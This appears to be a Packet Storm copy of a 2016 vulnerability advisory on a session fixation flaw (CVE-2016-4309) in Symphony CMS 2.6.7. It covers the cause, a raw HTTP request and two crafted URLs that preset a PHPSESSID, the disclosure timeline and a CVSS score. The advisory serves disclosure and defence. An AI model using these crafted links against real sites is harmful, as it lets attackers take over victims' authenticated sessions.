what you don't know can hurt you

Symphony CMS 2.6.7 Session Fixation

Symphony CMS 2.6.7 Session Fixation
Posted Jun 20, 2016
Authored by hyp3rlinx | Site hyp3rlinx.altervista.org

Symphony CMS version 2.6.7 suffers from a session fixation vulnerability.

tags | exploit
advisories | CVE-2016-4309
MD5 | 100717a348316936c74d6b491d34b151

Symphony CMS 2.6.7 Session Fixation

Change Mirror Download
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/SYMPHONY-CMS-SESSION-FIXATION.txt

[+] ISR: APPARITIONSEC


Vendor:
====================
www.getsymphony.com


Product:
==================
Symphony CMS v2.6.7

Download:
http://www.getsymphony.com/download/


Symphony is a XSLT-powered open source content management system.



Vulnerability Type:
===================
Session Fixation


CVE Reference:
==============
CVE-2016-4309



Vulnerability Details:
=====================

Symphony CMS is prone to "Session Fixation" allowing attackers to preset a
users PHPSESSID "Session Identifier".
If the application is deployed using an insecure setup with PHP.INI
"session.use_only_cookies" not enabled, attackers can then send
victims a link to the vulnerable application with the "PHPSESSID" already
initialized as Symphony does not use or call
"session_regenerate_id()" upon successful user authentication.

Note: as per php.net/manual/en/session.configuration.php
"session.use_only_cookies=1" is default since PHP 4.3.0.

e.g.

"http://localhost/symphony/?PHPSESSID=APPARITION666".

As Symphonys Session ID is not regenerated it can result in arbitrary
Session ID being 'Fixated' to a user, if that user authenticates using
this attacker supplied session fixated link, the attacker can now access
the affected application from a different Computer/Browser
and have the same level of access to that of the victim. Default Cookie
lifetime for Symphony CMS is up to two weeks.



Reproduction steps:
=====================

Edit PHP.INI and change following settings to 'session.use_only_cookies=0'
if applicable, as POC test.


1) Telnet localhost 80

2) make HTTP request with a prefixed PHPSESSID

GET /symphony-2.6.7/symphony/?PHPSESSID=PWN3D666 HTTP/1.1
Host: localhost
Connection: close

3) Hit enter twice


HTTP/1.1 200 OK
Date: Mon, 16 May 2016 02:06:47 GMT
Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1l PHP/5.6.8
X-Powered-By: PHP/5.6.8
Set-Cookie: PHPSESSID=PWNED666; expires=Mon, 30-May-2016 02:06:48 GMT;
Max-Age=1209600; path=/symphony-2.6.7; httponly
Content-Length: 1501
Connection: close
Content-Type: text/html; charset=UTF-8



Exploit code(s):
===============

1)
http://localhost/symphony-2.6.7/symphony/publish/articles/?PHPSESSID=hyp3rlinx

2) http://localhost/symphony-2.6.7/symphony/?PHPSESSID=APPARITION


Disclosure Timeline:
=====================================
Vendor Notification: May 3, 2016
Vendor Release Fix: May 23, 2016
June 20, 2016 : Public Disclosure.


Exploitation Method:
====================
Remote


Severity Level:
================
6.8 (Medium)
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N



Description:
==============================================
Request Method(s): [+] GET / POST


Vulnerable Product: [+] Symphony CMS 2.6.7


Vulnerable Parameter(s): [+] 'PHPSESSID'
===============================================

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    24 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    7 Files
  • 4
    Oct 4th
    4 Files
  • 5
    Oct 5th
    10 Files
  • 6
    Oct 6th
    1 Files
  • 7
    Oct 7th
    21 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    5 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    17 Files
  • 12
    Oct 12th
    4 Files
  • 13
    Oct 13th
    4 Files
  • 14
    Oct 14th
    15 Files
  • 15
    Oct 15th
    19 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close